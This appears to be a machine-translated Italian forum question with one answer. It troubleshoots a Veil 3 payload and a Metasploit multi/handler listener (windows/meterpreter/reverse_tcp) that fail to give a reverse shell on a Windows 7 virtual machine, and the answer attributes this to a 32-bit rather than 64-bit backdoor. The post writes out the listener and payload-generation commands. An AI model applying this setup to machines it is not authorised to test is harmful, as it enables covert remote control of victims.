Dove vado storto con Veil? Non riesci a ottenere un guscio inverso?

3

Ecco come sto generando il carico utile in Veil 3

> use XX
> set LHOST X.X.X.X
> set LPORT 3333
> generate

Il carico utile viene generato correttamente e trasferito alla macchina vittima Win7 SP1 VM senza antivirus di alcun tipo. Mentre sei alla fine di metasploit

> msfconsole
> use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST X.X.X.X
> set LPORT 3333
> set ExitOnSession false 
> exploit

X.X.X.X è un IP pubblico. Durante l'esecuzione, rimango bloccato al seguente e non succede nulla

[*] Started reverse TCP handler on X.X.X.X:3333

Dove sto andando male. Quale potrebbe essere il problema qui. Ho autorizzato la porta 3333 in ufw e nessun altro servizio sta ascoltando quella porta. Inoltre, dopo aver eseguito il payload sulla macchina vittima e facendo netstat non mi dà alcuna istanza della porta 3333 che comunica con X.X.X.X.

    
posta Youbecks003 04.03.2018 - 12:32
fonte

1 risposta

0

Ho avuto questo problema in passato, e il mio problema era che il carico utile del velo era una versione a 32 bit della backdoor generata. Ho dovuto usare la versione x64 della backdoor. Se non hai la versione a 64 bit del payload, dovrai aggiornare il velo e riprovare.

    
risposta data 26.11.2018 - 16:27
fonte

Leggi altre domande sui tag